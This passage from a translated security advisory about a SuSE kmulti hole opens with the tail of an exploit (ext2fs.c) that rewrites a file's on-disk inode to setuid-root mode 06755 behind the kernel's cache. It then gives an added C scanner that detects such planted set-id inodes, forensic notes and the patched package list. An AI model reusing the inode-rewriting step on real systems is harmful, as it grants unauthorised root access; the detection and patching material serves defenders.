    }
    stealth_inode.i_mode = 06755|S_IFREG;
    stealth_inode.i_uid = 0;
    stealth_inode.i_gid = 0;
    
    if (ext2fs_write_inode(fsd, st.st_ino, &stealth_inode) != 0) {
        fprintf(stderr, "Error writing inode.\n");
        exit(1);
    }
    if (ext2fs_close(fsd) != 0) {
        fprintf(stderr, "Error closing filesystem.\n");
        exit(1);
    }
    printf("The requested file will have mode 06755 after next remount. Make sure nobody\n"
           "open()/close() it until remount, coz kernel still has the old mode 0755 cached\n"
           "and will write this to disk if you do so!\n\n");
    return 0;
}
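The message printed at the end of ext2fs.c is also the forensic clue: until the next remount the kernel keeps serving the cached 0755 inode, so `find / -perm -4000` on the mounted filesystem will not show the planted 06755 file, while the bytes on the block device already do. The C program below is an added example for this page, not part of the advisory, of 7350kscd or of e2fsprogs. It reads a raw ext2 image and lists set-uid/set-gid regular files using the superblock, group-descriptor and inode offsets from the ext2_fs.h header above. scan_setid_inodes, build_test_image and demo_scan are names chosen here, and the 16 KiB image is constructed for the illustration rather than dumped from a real disk.

```c
/* Added example for this page, not part of the advisory, of 7350kscd or of
 * e2fsprogs: scan a raw ext2 image for set-uid/set-gid regular files using the
 * on-disk offsets from the ext2_fs.h header above.  Function names and the
 * image built by build_test_image() are constructed for the illustration. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

#define EXT2_SUPER_MAGIC 0xEF53
#define SB_OFFSET        1024     /* the superblock always starts at byte 1024 */
#define OLD_INODE_SIZE   128      /* EXT2_GOOD_OLD_INODE_SIZE */
#define GROUP_DESC_SIZE  32       /* sizeof(struct ext2_group_desc) */

struct setid_hit { uint32_t ino; uint16_t mode, uid, gid; };

/* ext2 fields are little-endian on disk; decode them byte-wise. */
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) { return rd16(p) | ((uint32_t)rd16(p + 2) << 16); }
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { wr16(p, (uint16_t)v); wr16(p + 2, (uint16_t)(v >> 16)); }

/* Walk every inode table; returns the number of set-id regular files
 * (the first `max` copied to `out`) or -1 if the image is malformed. */
int scan_setid_inodes(const uint8_t *img, size_t len, struct setid_hit *out, int max)
{
    const uint8_t *sb;
    uint32_t inodes_count, first_data_block, block_size, inodes_per_group, inode_size;
    uint32_t groups, g;
    int hits = 0;

    if (len < SB_OFFSET + 1024)
        return -1;
    sb = img + SB_OFFSET;
    if (rd16(sb + 56) != EXT2_SUPER_MAGIC)              /* s_magic */
        return -1;
    inodes_count     = rd32(sb + 0);                    /* s_inodes_count     */
    first_data_block = rd32(sb + 20);                   /* s_first_data_block */
    block_size       = 1024u << rd32(sb + 24);          /* s_log_block_size   */
    inodes_per_group = rd32(sb + 40);                   /* s_inodes_per_group */
    inode_size = rd32(sb + 76) == 0 ? OLD_INODE_SIZE : rd16(sb + 88); /* rev 0 has no s_inode_size */
    if (inodes_per_group == 0 || inode_size < OLD_INODE_SIZE || block_size > 4096)
        return -1;
    groups = (inodes_count + inodes_per_group - 1) / inodes_per_group;

    for (g = 0; g < groups; g++) {
        /* the group descriptor table sits in the block after the superblock's */
        uint64_t gd_off = (uint64_t)(first_data_block + 1) * block_size + (uint64_t)g * GROUP_DESC_SIZE;
        uint64_t itab_off;
        uint32_t i;

        if (gd_off + GROUP_DESC_SIZE > len)
            return -1;
        itab_off = (uint64_t)rd32(img + gd_off + 8) * block_size;   /* bg_inode_table */
        for (i = 0; i < inodes_per_group; i++) {
            uint32_t ino = g * inodes_per_group + i + 1;            /* inode numbers are 1-based */
            uint64_t off = itab_off + (uint64_t)i * inode_size;
            uint16_t mode;

            if (ino > inodes_count)
                break;
            if (off + OLD_INODE_SIZE > len)
                return -1;
            mode = rd16(img + off);                                 /* i_mode */
            if ((mode & 0170000) != 0100000 || (mode & 06000) == 0) /* regular file with S_ISUID/S_ISGID */
                continue;
            if (hits < max) {
                out[hits].ino  = ino;
                out[hits].mode = mode;
                out[hits].uid  = rd16(img + off + 2);               /* i_uid */
                out[hits].gid  = rd16(img + off + 24);              /* i_gid */
            }
            hits++;
        }
    }
    return hits;
}

/* Constructed 16 KiB image: 1 KiB blocks, one group of 16 inodes, inode table at
 * block 5.  Inode 12 is an ordinary 0755 file; inode 13 carries the 06755,
 * uid 0 mode that ext2fs.c writes into the target file. */
uint8_t *build_test_image(size_t *len)
{
    uint8_t *img = calloc(1, 16 * 1024), *sb, *gd, *itab;
    if (!img)
        return NULL;
    sb = img + SB_OFFSET; gd = img + 2 * 1024; itab = img + 5 * 1024;
    wr32(sb + 0, 16); wr32(sb + 20, 1); wr32(sb + 24, 0); wr32(sb + 40, 16);
    wr16(sb + 56, EXT2_SUPER_MAGIC); wr32(sb + 76, 1); wr16(sb + 88, OLD_INODE_SIZE);
    wr32(gd + 8, 5);
    wr16(itab + 11 * 128, 0100755); wr16(itab + 11 * 128 + 2, 1000); wr16(itab + 11 * 128 + 24, 100);
    wr16(itab + 12 * 128, 0106755); wr16(itab + 12 * 128 + 2, 0);    wr16(itab + 12 * 128 + 24, 0);
    *len = 16 * 1024;
    return img;
}

/* Scan the constructed image; the first hit goes to *h, the return value is the count. */
int demo_scan(struct setid_hit *h)
{
    size_t len;
    uint8_t *img = build_test_image(&len);
    int n = img ? scan_setid_inodes(img, len, h, 1) : -1;
    free(img);
    return n;
}

int main(void)
{
    struct setid_hit h = {0, 0, 0, 0};
    int n = demo_scan(&h);
    if (n > 0)
        printf("%d set-id inode(s); first: inode %u mode %06o uid %u gid %u\n",
               n, (unsigned)h.ino, (unsigned)h.mode, (unsigned)h.uid, (unsigned)h.gid);
    return n < 0;
}
```

Against a live system the same scan is run as root over the device the exploit was pointed at (the /dev/hdaX argument of 7350kscd), reading group by group rather than holding the whole device in memory. Comparing each hit with stat() on the mounted filesystem pinpoints inodes whose on-disk mode disagrees with what the kernel has cached, which is exactly the state ext2fs.c leaves behind before the remount.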


Recommendation:
SuSE has released updated kmulti packages; they can be downloaded from the addresses below (MD5 checksum followed by URL):

AXP:
817852e77080ecb444cb3ab9d0e6f52d  ftp://ftp.suse.com/pub/suse/axp/update/6.1/kde1/kmulti-1.1.2-141.alpha.rpm
bf3ea6a10793225d5468efa72efb13cb  ftp://ftp.suse.com/pub/suse/axp/update/6.1/zq1/kmulti-1.1.2-141.src.rpm
8e1cc62cf437c43eca044562637d9ea3  ftp://ftp.suse.com/pub/suse/axp/update/6.3/kde1/kmulti-1.1.2-141.alpha.rpm
61dc0c2588a707ec9ba1c6be00aac58c  ftp://ftp.suse.com/pub/suse/axp/update/6.3/zq1/kmulti-1.1.2-141.src.rpm
45e951b3b14435a1c1ab89d3e4e5df1d  ftp://ftp.suse.com/pub/suse/axp/update/6.4/kde1/kmulti-1.1.2-141.alpha.rpm
a70b356603227e1a0e49d0eeab934ad8  ftp://ftp.suse.com/pub/suse/axp/update/6.4/zq1/kmulti-1.1.2-141.src.rpm

i386:
d4c6bc55edbb9aa4da76b2d9b186e6a9  ftp://ftp.suse.com/pub/suse/i386/update/6.1/kde1/kmulti-1.1.2-141.i386.rpm
9ac324e3a9bb1794280d8175f5762d5d  ftp://ftp.suse.com/pub/suse/i386/update/6.1/zq1/kmulti-1.1.2-141.src.rpm
f8318113abdde6e2a9118db63d50a550  ftp://ftp.suse.com/pub/suse/i386/update/6.2/kde1/kmulti-1.1.2-141.i386.rpm
18d5fc80412db2dc70770d9b175180d9  ftp://ftp.suse.com/pub/suse/i386/update/6.2/zq1/kmulti-1.1.2-141.src.rpm
43f1febe8dc5502132246b8ad977db54  ftp://ftp.suse.com/pub/suse/i386/update/6.3/kde1/kmulti-1.1.2-141.i386.rpm
bce686afd6186c9cb9816ccf95744040  ftp://ftp.suse.com/pub/suse/i386/update/6.3/zq1/kmulti-1.1.2-141.src.rpm
4a14b88f9b6f80c8ffcf4b82750d7bfb  ftp://ftp.suse.com/pub/suse/i386/update/6.4/kde1/kmulti-1.1.2-140.i386.rpm
de787463851f38b69e576cf8de7d9309  ftp://ftp.suse.com/pub/suse/i386/update/6.4/zq1/kmulti-1.1.2-140.src.rpm

PPC:
3de7429a24620ca2b7e61f799478e2b8  ftp://ftp.suse.com/pub/suse/ppc/update/6.4/kde1/kmulti-1.1.2-141.ppc.rpm
444e9ffc4fbc643deb208c45bcb31725  ftp://ftp.suse.com/pub/suse/ppc/update/6.4/zq1/kmulti-1.1.2-141.src.rpm

This advisory was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; reproduction without permission is prohibited.